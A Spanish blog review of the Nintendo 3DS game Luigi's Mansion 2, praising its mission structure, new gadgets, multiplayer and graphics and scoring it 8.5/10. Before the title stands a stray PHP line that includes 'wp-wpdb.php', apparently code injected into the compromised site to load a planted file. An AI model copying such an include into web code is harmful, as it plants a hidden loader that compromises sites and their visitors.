if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Luigi’s Mansion 2 para Nintendo 3DS – La Fortaleza de LeChuck

Análisis Luigi’s Mansion 2 para Nintendo 3DS

Si algo distingue a las portatiles de Nintendo es que aunque no siempre sean del gusto de mucha gente, tiene un catálogo propio y no se basa en ports o simples reediciones de las consolas mayores. Aunque eso haya hecho que le cueste arrancar, resulta que pueden salir juegos como Luigi’s Mansion 2, un prometedor AAA para tu Nintendo 3DS abanderando «El año de Luigi» ¿Consigue Luigi hacer olvidar a Mario?
 ¡Y tu te creías que el 2013 era el año de la mala suerte! No piensa lo mismo el gran Luigi (Mi personaje del reino champiñón favorito) que vuelve a la mansión cogiendo de nuevo el protagonismo desde su primera aventura fantasmagórica en Gamecube, lanzado en Europa en un lejano año 2002. Imaginaos, 11 años esperando que Luigi vuelva a coger su aspiradora, y después de varias épocas de rumores en las consolas mayores (Sobretodo en Wii con la idea de aspiradora-linterna-Wiimando), Nintendo ha decidido darle una nueva oportunidad en Nintendo 3DS.
Si recuerdas la primera parte, sabrás que Luigi es, posiblemente, el protagonista más «cagueta» que ha pisado un videojuego. Sin duda, eso lo hace más humano, y parecía que eso lo mantenía a la sombra de Mario, ese personaje «plano» que solo va detrás de Bowser para rescatar a la princesa Peach. Nada de eso, «Luigi is the winner» y así lo demostró con el original Luigi’s Mansion y su gran apartado técnico, dejando boquiabiertos a todos los que se quedaron sin su «Mario» de lanzamiento junto a Gamecube.
Todo hay que decirlo, el juego no era del todo redondo. Quizás tenía tanto de original como de repetitivo. Sí, explorar y rastrear con nuestra aspiradora «Poltergust 3000» era divertido, pero hasta cierto punto le faltó variedad al título de Luigi, además de una relativa corta duración (Aunque ahora quizás estaría bien aceptado).
Por suerte, Nintendo le ha dado otra oportunidad a Luigi, para que vuelva a demostrar que todavía había mucho jugo que sacar a su original planteamiento. Luigi’s Mansion 2 trae varias novedades que seguro gustarán a todos los fans de las aventuras.
 Tenemos un gran ejemplo en la mansión. Ahora las misiones se basarán en distintos escenarios con ambientaciones diferentes. El Luigi’s Mansion original tenía la pega de que al ser una sola mansión gigante te pasabas la mayoría de tiempo recorriendo pasillos ya explorados. Eso está mejor resuelto en Luigi’s Mansion 2 en Nintendo 3DS. El «Profesor Fesor«, principal culpable de meter a Luigi de nuevo a cazar fantasmas, nos teletransportará a las zonas de cada submisión para que no tengamos que recorrer zonas donde no hay nada que ver. Habéis leído bien, en cada mansión habrán ciertas misiones que poco a poco esclarecerán donde conseguir nuestro objetivo, los fragmentos de la luna oscura.
La luna oscura ha sido robada y dividida en cuatro por los revolucionarios fantasmas, siendo contaminadas y provocando la gran niebla que azota el valle. Cada una de esas zonas con mansión incluida, son las que iremos desbloqueando según vayamos completando las misiones principales y consigamos los fragmentos de luna oscura.
Además de esas misiones principales, también nos encontraremos con secretos secundarios, como por ejemplo las búsquedas de los Boo, fantasmas clásicos de la saga Mario, que han sido incluidos como unos fantasmas diferentes a los habituales en Luigi’s Mansion. A estos tenemos otra forma de «combatirlos» que le da variedad respecto a la tónica de linterna+aspiradora general. También encontraremos algunos objetos que nos ayudarán en la aventura, como los «huesos» que nos dará una vida extra si se nos vacía nuestra energía sin tener que reiniciar la misión.
Nuestra maravillosa aspira-fantasmas Poltergust 3000 no va a ser el único gadget que tendremos en nuestras manos, la «estrobombilla«(La linterna con la que cegamos a los fantasmas para comenzar la captura) y el «desoscurizador«, una nueva herramienta que nos servirá para descubrir objetos que han sido invisibilizados por los Boo.

No podemos olvidar, que Nintendo esta vez ha querido redondear Luigi’s Mansion 2 con un modo multijugador, donde podremos jugar a varios modos para cazar fantasmas Online con hasta cuatro jugadores. Aunque no es el modo principal, se hace bastante divertido y casi no se echa de menos no poder hablar con los compañeros nada más que por señas (Nintendo y sus modos online, ya ustedes saben)

Técnicamente, me atrevo a decir, Luigi’s Mansion 2 es el mejor juego hasta la fecha para Nintendo 3DS. Los modelados son geniales, incluso (Si no me falla la memoria) mejorando al Luigi original de Gamecube. Las animaciones se muestran simpáticas y fascinantes, y los detalles en los escenarios se cuentan por decenas (Reflejos, efectos de luz, polvo, mobiliario poco repetitivo, etc). Lástima lo inapreciable de este apartado en pantallazos, dado la baja resolución en la que trabaja la consola ¡Mejor verlo directamente en la consola y a poder ser, con el 3D activado!
En el aspecto sonoro Luigi nos vuelve a mostrar su temor constantemente, con sustos, alaridos, y todo tipo de sonidos de poca confianza. Por supuesto todos los demas efectos de sonido acompañan armoniosamente, aunque debemos de decir, que aunque la melodía de Luigi’s Mansion es genial, se acaba haciendo un poco repetitiva, ya no solo porque en cada mansión suene una versión diferente de ella, sino porque las llamadas del Professor Fesor piden un botón de silencio en el comunicador que usa Luigi para hablar con el ¡Es pegadiza, pero es que te llama cada dos pasos que das para masticar lo que tu no entiendas!
Concluyendo, Nintendo ha hecho un gran trabajo limando la jugabilidad del primer Luigi’s Mansion. Novedades como la variedad de escenarios, las nuevas formas de capturar fantasmas (El desoscurizador le da un puntillo novedoso y más explorador), el perrito fantasma (sí, hay un escurridizo perrito fantasma muy majete que nos iremos encontrando a lo largo del juego ¿A que mola?), etc.
Luigi’s Mansion 2 demuestra que una consola portátil también puede tener juegos cuidados, completos y enganchantes, y no solo deben vivir de juegos sencillos o reediciones de juegos de otras generaciones. Un juego cuidado al máximo detalle y tratado con mimo como un auténtico AAA. Puedes comprar Luigi’s Mansion de oferta al mejor precio aquí.
Nota 8,5/10